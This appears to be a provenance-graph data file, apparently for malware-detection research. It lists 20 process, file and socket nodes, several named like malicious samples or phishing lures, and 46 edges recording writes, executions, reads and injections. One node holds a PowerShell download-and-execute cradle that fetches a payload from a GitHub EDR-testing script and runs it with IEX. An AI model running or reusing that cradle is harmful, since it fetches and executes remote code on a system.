20
MP-FISCALIA GENERAL DE LA NACION --.exe 
MF-\Users\admin\AppData\Local\Temp\RESF360.tmp
MF-TEMP\T1059.007.out.txt
MP-de6a9b27-2bca-4abb-8a20-2deeaa715179.exe
MP-IEmode.exe 
SF-C:\Users\admin\AppData\Local\Temp\RE_PENDING
MP*-explorer.exe 
TP-SearchProtocolHost.exe
TP-SecuriteInfo.com
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
TF-C:\Users\admin\AppData\Local\Temp\tmp8520.tmp
TP*-ns9B66.tmp 
TF-C:\Users\admin\Downloads\PC_Cleaner__5509.exe
MF-danke.exe
SF-C:\Windows\SysWOW64\help.exe
MF-Order.htm
MP-CareUEyes_setup.exe
MF-C:\Users\admin\AppData\Local\Temp\863e7c22c771e4005197ae28363584f8
TP*-a6302410.exe
MP*-Ürünla_fiyat 10243975_formu scann..10 adet.exe
46
0 1 WR-1
0 2 EX-1
0 3 UK-1
4 1 RD-1
4 2 WR-1
4 5 UK-1
6 1 WR-1
6 2 RD-1
7 1 UK-1
8 2 WR-1
6 8 IJ-1
9 6 RF-1
8 9 ST-1
6 10 WR-1
8 10 RD-1
11 2 RD-2
6 11 IJ-1
8 11 IJ-1
11 9 ST-2
11 10 WR-2
6 12 UK-1
8 13 RD-1
11 13 WR-2
8 14 RD-1
11 14 WR-2
8 15 WR-1
11 15 RD-2
8 16 IJ-1
9 16 RF-2
16 10 WR-2
11 16 UK-2
8 17 RD-1
8 18 IJ-1
18 9 ST-3
18 10 EX-3
18 13 WR-3
18 14 RD-3
18 15 CD-3
18 17 WR-3
9 19 RF-2
19 10 RD-4
19 13 EX-4
19 14 RD-4
19 15 RD-4
19 17 WR-4
18 19 UK-3

